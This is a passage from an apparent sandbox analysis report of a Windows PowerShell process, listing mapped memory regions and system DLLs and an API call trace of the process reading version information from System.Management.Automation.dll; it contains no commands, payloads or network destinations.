"\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 694 start_va = 0x7fefde40000 end_va = 0x7fefde47fff entry_point = 0x7fefde40000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 695 start_va = 0x7ff00220000 end_va = 0x7ff0022ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00220000" filename = "" Region: id = 696 start_va = 0x7ff00230000 end_va = 0x7ff0023ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00230000" filename = "" Region: id = 697 start_va = 0x28f0000 end_va = 0x28fffff entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 698 start_va = 0x2900000 end_va = 0x290ffff entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 699 start_va = 0x2910000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 700 start_va = 0x2920000 end_va = 0x292ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 701 start_va = 0x7ff00240000 end_va = 0x7ff0024ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00240000" filename = "" Region: id = 702 start_va = 0x7ff00250000 end_va = 0x7ff0025ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00250000" filename = "" Region: id = 703 start_va = 0x7ff00260000 end_va = 0x7ff0026ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00260000" filename = "" Region: id = 995 start_va = 0x2930000 end_va = 0x293ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 996 start_va = 0x1bf60000 end_va = 0x1c8effff entry_point = 0x0 region_type = private name = "private_0x000000001bf60000" filename = "" Region: id = 997 start_va = 0x7fede2c0000 end_va = 0x7fede402fff entry_point = 0x7fede2c0000 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System.Configuration\\091b931d0f6408001747dbbbb05dbe66\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system.configuration\\091b931d0f6408001747dbbbb05dbe66\\system.configuration.ni.dll") Region: id = 998 start_va = 0x7ff00270000 end_va = 0x7ff0027ffff entry_point = 0x0 region_type = private name = "private_0x000007ff00270000" filename = "" Region: id = 999 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 1000 start_va = 0x7fef46b0000 end_va = 0x7fef46cbfff entry_point = 0x7fef46b0000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 1001 start_va = 0x7fef46d0000 end_va = 0x7fef4731fff entry_point = 0x7fef46d0000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 1002 start_va = 0x7fefb5b0000 end_va = 0x7fefb5c0fff entry_point = 0x7fefb5b0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 1003 start_va = 0x7fefcdc0000 end_va = 0x7fefce14fff entry_point = 0x7fefcdc0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1004 start_va = 0x1c8f0000 end_va = 0x1ca8ffff entry_point = 0x0 region_type = private name = "private_0x000000001c8f0000" filename = "" Region: id = 1005 start_va = 0x7fefc7c0000 end_va = 0x7fefc7c6fff entry_point = 0x7fefc7c0000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 1006 start_va = 0x7fefcdb0000 end_va = 0x7fefcdb6fff entry_point = 0x7fefcdb0000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 1007 start_va = 0x29d0000 end_va = 0x29effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000029d0000" filename = "" Region: id = 1008 start_va = 0x1cad0000 end_va = 0x1cb4ffff entry_point = 0x0 region_type = private name = "private_0x000000001cad0000" filename = "" Region: id = 1009 start_va = 0x7fef61c0000 end_va = 0x7fef6223fff entry_point = 0x7fef61c0000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 1010 start_va = 0x7fef6230000 end_va = 0x7fef62a0fff entry_point = 0x7fef6230000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 1011 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 1012 start_va = 0x7fefb000000 end_va = 0x7fefb026fff entry_point = 0x7fefb000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1013 start_va = 0x7fefaff0000 end_va = 0x7fefaffafff entry_point = 0x7fefaff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1014 start_va = 0x7fefad70000 end_va = 0x7fefad80fff entry_point = 0x7fefad70000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 1015 start_va = 0x7fefad50000 end_va = 0x7fefad67fff entry_point = 0x7fefad50000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 1016 start_va = 0x7fefca20000 end_va = 0x7fefca29fff entry_point = 0x7fefca20000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1017 start_va = 0x1c980000 end_va = 0x1c9fffff entry_point = 0x0 region_type = private name = "private_0x000000001c980000" filename = "" Region: id = 1018 start_va = 0x1ca10000 end_va = 0x1ca8ffff entry_point = 0x0 region_type = private name = "private_0x000000001ca10000" filename = "" Region: id = 1019 start_va = 0x7fefcc40000 end_va = 0x7fefcc9afff entry_point = 0x7fefcc40000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1020 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 1021 start_va = 0x1cb50000 end_va = 0x1cd9ffff entry_point = 0x0 region_type = private name = "private_0x000000001cb50000" filename = "" Region: id = 1022 start_va = 0x7fef53d0000 end_va = 0x7fef53d7fff entry_point = 0x7fef53d0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1036 start_va = 0x75280000 end_va = 0x75282fff entry_point = 0x75280000 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1037 start_va = 0x7fefcbb0000 end_va = 0x7fefcc06fff entry_point = 0x7fefcbb0000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1038 start_va = 0x7fefcfc0000 end_va = 0x7fefd00dfff entry_point = 0x7fefcfc0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1039 start_va = 0x7fefcf90000 end_va = 0x7fefcfb1fff entry_point = 0x7fefcf90000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1040 start_va = 0x7fefca60000 end_va = 0x7fefcaabfff entry_point = 0x7fefca60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1041 start_va = 0x1b4a0000 end_va = 0x1b51ffff entry_point = 0x0 region_type = private name = "private_0x000000001b4a0000" filename = "" Region: id = 1042 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 1043 start_va = 0x1cda0000 end_va = 0x1cf9ffff entry_point = 0x0 region_type = private name = "private_0x000000001cda0000" filename = "" Region: id = 1044 start_va = 0x7fefc8b0000 end_va = 0x7fefc8cafff entry_point = 0x7fefc8b0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1045 start_va = 0x7fef5240000 end_va = 0x7fef5265fff entry_point = 0x7fef5240000 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 1046 start_va = 0x7fef86c0000 end_va = 0x7fef86dafff entry_point = 0x7fef86c0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 1047 start_va = 0x7fefc8f0000 end_va = 0x7fefc901fff entry_point = 0x7fefc8f0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 1048 start_va = 0x2940000 end_va = 0x2941fff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 1049 start_va = 0x29f0000 end_va = 0x29f0fff entry_point = 0x0 region_type = private name = "private_0x00000000029f0000" filename = "" Region: id = 1050 start_va = 0x2a00000 end_va = 0x2a00fff entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 1051 start_va = 0x2a00000 end_va = 0x2a00fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a00000" filename = "" Region: id = 1052 start_va = 0x7fefae40000 end_va = 0x7fefae48fff entry_point = 0x7fefae40000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 1081 start_va = 0x2a10000 end_va = 0x2a13fff entry_point = 0x2a10000 region_type = mapped_file name = "winhttp.dll.mui" filename = "\\Windows\\System32\\en-US\\winhttp.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winhttp.dll.mui") Region: id = 1082 start_va = 0x1bea0000 end_va = 0x1bf1ffff entry_point = 0x0 region_type = private name = "private_0x000000001bea0000" filename = "" Region: id = 1083 start_va = 0x7fefae80000 end_va = 0x7fefaed2fff entry_point = 0x7fefae80000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1084 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1085 start_va = 0x1cb90000 end_va = 0x1cc0ffff entry_point = 0x0 region_type = private name = "private_0x000000001cb90000" filename = "" Region: id = 1086 start_va = 0x1cd20000 end_va = 0x1cd9ffff entry_point = 0x0 region_type = private name = "private_0x000000001cd20000" filename = "" Region: id = 1087 start_va = 0x7ff00280000 end_va = 0x7ff002bffff entry_point = 0x0 region_type = private name = "private_0x000007ff00280000" filename = "" Region: id = 1088 start_va = 0x7ff002c0000 end_va = 0x7ff002cffff entry_point = 0x0 region_type = private name = "private_0x000007ff002c0000" filename = "" Region: id = 1089 start_va = 0x7ff002d0000 end_va = 0x7ff002dffff entry_point = 0x0 region_type = private name = "private_0x000007ff002d0000" filename = "" Region: id = 1090 start_va = 0x2a20000 end_va = 0x2a23fff entry_point = 0x2a20000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1091 start_va = 0x1c900000 end_va = 0x1c97ffff entry_point = 0x0 region_type = private name = "private_0x000000001c900000" filename = "" Region: id = 1092 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 1093 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1094 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1095 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1096 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1097 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1098 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1099 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1100 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1101 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1102 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1103 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1104 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1105 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1106 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1107 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1108 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1109 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1110 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1111 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1112 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1113 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1114 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1115 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1116 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1117 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1118 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1119 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1120 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1121 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1122 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1123 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1124 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1125 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1126 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1127 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1128 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1129 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1130 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1131 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1132 start_va = 0x1cc10000 end_va = 0x1cd10fff entry_point = 0x0 region_type = private name = "private_0x000000001cc10000" filename = "" Region: id = 1133 start_va = 0x7fef82e0000 end_va = 0x7fef8313fff entry_point = 0x7fef82e0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1134 start_va = 0x7fefec10000 end_va = 0x7fefed87fff entry_point = 0x7fefec10000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 1135 start_va = 0x7fefdbb0000 end_va = 0x7fefdcd9fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 1136 start_va = 0x7feff080000 end_va = 0x7feff2d8fff entry_point = 0x7feff080000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 1137 start_va = 0x2a30000 end_va = 0x2a30fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002a30000" filename = "" Thread: id = 27 os_tid = 0xacc [0053.806] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0054.734] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0054.734] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0054.735] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0054.735] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0056.640] GetVersionExW (in: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0056.642] GetVersionExW (in: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24ddc0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0056.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.680] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0056.680] GetVersionExW (in: lpVersionInformation=0x24db30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24db30*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0056.681] SetErrorMode (uMode=0x1) returned 0x1 [0056.682] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24dc90 | out: lpFileInformation=0x24dc90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0056.683] SetErrorMode (uMode=0x1) returned 0x1 [0056.744] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24df00 | out: lpdwHandle=0x24df00) returned 0x94c [0056.748] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2dd7388 | out: lpData=0x2dd7388) returned 1 [0056.751] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24de78, puLen=0x24de70 | out: lplpBuffer=0x24de78*=0x2dd7424, puLen=0x24de70) returned 1 [0056.753] lstrlenW (lpString="䅁") returned 1 [0056.769] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd7500, puLen=0x24dde0) returned 1 [0056.770] lstrlenW (lpString="Microsoft Corporation") returned 21 [0056.774] CoTaskMemAlloc (cb=0x2e) returned 0x159c30 [0056.775] lstrcpyW (in: lpString1=0x159c30, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0056.776] CoTaskMemFree (pv=0x159c30) [0056.776] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd7554, puLen=0x24dde0) returned 1 [0056.776] lstrlenW (lpString="System.Management.Automation") returned 28 [0056.776] CoTaskMemAlloc (cb=0x3c) returned 0xfb380 [0056.776] lstrcpyW (in: lpString1=0xfb380, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0056.776] CoTaskMemFree (pv=0xfb380) [0056.776] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd75b0, puLen=0x24dde0) returned 1 [0056.776] lstrlenW (lpString="6.1.7601.17514") returned 14 [0056.776] CoTaskMemAlloc (cb=0x20) returned 0x15ea70 [0056.776] lstrcpyW (in: lpString1=0x15ea70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0056.776] CoTaskMemFree (pv=0x15ea70) [0056.776] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd75f0, puLen=0x24dde0) returned 1 [0056.776] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0056.776] CoTaskMemAlloc (cb=0x44) returned 0xfb380 [0056.776] lstrcpyW (in: lpString1=0xfb380, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0056.776] CoTaskMemFree (pv=0xfb380) [0056.776] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd7658, puLen=0x24dde0) returned 1 [0056.776] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0056.777] CoTaskMemAlloc (cb=0x76) returned 0xe42e0 [0056.777] lstrcpyW (in: lpString1=0xe42e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0056.777] CoTaskMemFree (pv=0xe42e0) [0056.777] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd76f4, puLen=0x24dde0) returned 1 [0056.777] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0056.777] CoTaskMemAlloc (cb=0x44) returned 0xfb380 [0056.777] lstrcpyW (in: lpString1=0xfb380, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0056.777] CoTaskMemFree (pv=0xfb380) [0056.777] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd7758, puLen=0x24dde0) returned 1 [0056.777] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0056.777] CoTaskMemAlloc (cb=0x58) returned 0xb1a40 [0056.777] lstrcpyW (in: lpString1=0xb1a40, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0056.777] CoTaskMemFree (pv=0xb1a40) [0056.777] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd77d4, puLen=0x24dde0) returned 1 [0056.777] lstrlenW (lpString="6.1.7601.17514") returned 14 [0056.777] CoTaskMemAlloc (cb=0x20) returned 0x15ea70 [0056.777] lstrcpyW (in: lpString1=0x15ea70, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0056.777] CoTaskMemFree (pv=0x15ea70) [0056.778] VerQueryValueW (in: pBlock=0x2dd7388, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24dde8, puLen=0x24dde0 | out: lplpBuffer=0x24dde8*=0x2dd747c, puLen=0x24dde0) returned 1 [0056.778] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0056.778] 